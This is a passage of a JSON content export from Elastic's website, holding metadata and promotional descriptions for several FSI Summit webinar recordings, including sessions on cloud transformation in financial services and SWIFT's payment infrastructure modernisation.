services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Beginner","label_l10n":"Beginner","keyword":"beginner","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltb615bb59f2a540ed","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2021-08-24T12:52:37.481Z","updated_at":"2021-08-24T12:52:37.481Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-01T14:18:24.950Z","user":"blt86e7fb24ab3b9a29"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltdf59d18fa27d1692","ACL":{},"created_at":"2023-11-06T21:34:55.381Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"tool-consolidation","label_l10n":"Tool consolidation","tags":[],"title":"Tool consolidation","updated_at":"2023-11-06T21:34:55.381Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.747Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Shaping the Future of Financial Services with Elastic","token":"0Q1QZ2VVTS","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T20:14:39.659Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/shaping-the-future-of-financial-services-with-elastic","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"H1VwvBaqnShy4frLuJh4HW","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T20:14:44.319Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfc25368f81dcf6d2","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-18T09:44:45.665Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Optimizing Cloud Transformation in Financial Services: Strategies for 2025 and Beyond","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs financial institutions modernize their cloud infrastructure, they must manage growing security events, 45 billion daily at JPMorgan, while navigating data silos, compliance challenges, and a cybersecurity talent shortage. In this session, \u003cstrong\u003eJohnny Bylen, Elastic’s Director of Value Engineering\u003c/strong\u003e, shares strategies for optimizing cloud transformation while balancing innovation, cost, and security.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eData visibility \u0026amp; access: \u003c/strong\u003eUnify siloed data while maintaining compliance with cross-cluster search.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eRegulatory compliance \u0026amp; retention: \u003c/strong\u003eManage complex data retention policies cost-effectively with searchable snapshots.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eReducing technical debt: \u003c/strong\u003eConsolidate legacy systems and tools to lower costs and improve compliance.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eInfrastructure modernization: \u003c/strong\u003eBridge gaps between cloud and on-premises environments while controlling costs.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eFinancial institutions need practical solutions to balance data management, security, and efficiency. Learn how Elastic’s unified platform reduces fragmentation, enhances security, and supports AI-driven innovation. Watch the session.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt6685fe25f1ce26c9"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Cloud Transformation Strategies for Financial Services in 2025 and Beyond","seo_description_l10n":"Learn how financial institutions optimize cloud transformation while balancing security, compliance, and cost. Watch the session with Elastic’s expert now.","seo_keywords_l10n":"cloud transformation, financial services, security, compliance, tech debt","seo_image":{"uid":"blt9dbad11f3afc6d73","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Johnny Bylen.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T09:42:46.268Z","updated_at":"2025-02-18T09:42:46.268Z","content_type":"image/png","file_size":"97221","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Johnny_Bylen.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T20:14:04.262Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9dbad11f3afc6d73/67b456166044a182e0f7bdd4/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Johnny_Bylen.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Beginner","label_l10n":"Beginner","keyword":"beginner","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltb615bb59f2a540ed","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2021-08-24T12:52:37.481Z","updated_at":"2021-08-24T12:52:37.481Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-01T14:18:24.950Z","user":"blt86e7fb24ab3b9a29"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt4732ba20ad170771","ACL":{},"created_at":"2023-11-06T20:48:01.608Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"public-multi-hybrid-cloud","label_l10n":"Public, multi \u0026 hybrid cloud","tags":[],"title":"Public, multi \u0026 hybrid cloud","updated_at":"2023-11-06T20:48:01.608Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:51.878Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blte0256e5390d036ed","ACL":{},"created_at":"2023-11-06T20:25:43.573Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-migration","label_l10n":"Cloud migration","tags":[],"title":"Cloud migration","updated_at":"2023-11-06T20:25:43.573Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:27.667Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"title":"Cloud monitoring","label_l10n":"Cloud monitoring","keyword":"cloud-monitoring","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt4f82459203f5a666","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:35:08.968Z","updated_at":"2023-11-06T20:35:08.968Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:35.872Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Optimizing Cloud Transformation in Financial Services: Strategies for 2025 and Beyond","token":"969EW8BVE0","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T20:13:58.178Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/optimizing-cloud-transformation-in-financial-services-in-2025","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"6ZyJj2hVtm8yog1QDEbYhu","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T20:14:03.173Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta61c6ff24d51cde9","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-17T18:04:29.551Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Modernizing payment infrastructure at a global scale. The Swift case","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eWhen SWIFT’s support teams took 12 minutes to access client data and up to four days to resolve cases, they knew their legacy systems needed a transformation. With billions of transactions flowing daily, how could they modernize while ensuring unmatched reliability? Hear from \u003cstrong\u003eSWIFT’s Head of Customer Success, Stefan De Moerloose,\u003c/strong\u003e and \u003cstrong\u003eElastic’s Principal Solutions Architect, Arno van de Velde\u003c/strong\u003e, as they reveal how real-time observability and AI-driven analytics revolutionized SWIFT’s operations.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eUnified data platform: \u003c/strong\u003eA single source of truth for seamless operations across hundreds of applications.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eCustomer service improvements: \u003c/strong\u003eCase resolution slashed from days to 30 minutes, with response times cut to instant.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eOperational excellence: \u003c/strong\u003eLearn how Elastic's common schema and real-time correlation capabilities help SWIFT maintain five-nines availability across its global network.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eInnovation in action: \u003c/strong\u003eHow generative AI is enhancing automation and customer experience.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eDiscover practical strategies to modernize payment infrastructure while scaling securely. \u003cstrong\u003eWatch the session\u003c/strong\u003e and learn how observability transforms payment operations from reactive to proactive.\u003c/p\u003e","presentation_date":"2024-06-05T09:00:00.000Z","presenter":["bltde106efafe80ec99","blt02a5fd757bab520a"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How SWIFT Transformed Payment Infrastructure with Real-Time Observability","seo_description_l10n":"Discover how SWIFT modernized its payment infrastructure, reducing case resolution times from days to 30 minutes with Elastic’s real-time observability and AI-driven analytics. Watch now to learn how to scale payment operations securely. Watch the session","seo_keywords_l10n":"payment infrastructure, observability, AI, payments, Swift","seo_image":{"uid":"blt6f791ed7e292da65","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_1200x627_Stefan De Moerloose.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-17T17:58:44.624Z","updated_at":"2025-02-17T17:58:44.624Z","content_type":"image/png","file_size":"617023","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_1200x627_Stefan_De_Moerloose.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T19:49:02.236Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6f791ed7e292da65/67b378d4f178482dd72be84f/169165_-_Ad_Banners_for_FSI_Sunmmit_1200x627_Stefan_De_Moerloose.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltc8e4f4eb4eed3ccd","ACL":{},"created_at":"2023-11-06T21:42:18.209Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"infrastructure-monitoring","label_l10n":"Infrastructure monitoring","tags":[],"title":"Infrastructure monitoring","updated_at":"2023-11-06T21:42:18.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.160Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt9fb9f67ee7bb5c15","ACL":{},"created_at":"2023-11-06T20:50:46.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"real-time-analysis","label_l10n":"Real-time analysis","tags":[],"title":"Real-time analysis","updated_at":"2023-11-06T20:50:46.256Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:43.334Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Modernizing payment infrastructure at a global scale. The Swift case","token":"8AGMHTMVNW","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T19:55:34.438Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/modernizing-payment-infrastructure-globally-swift","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"WiiqKFPZZbk7PwZDusx6HS","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T19:55:44.300Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blte629dc6ebe537554","_version":6,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:15:28.985Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | Informatica \u0026 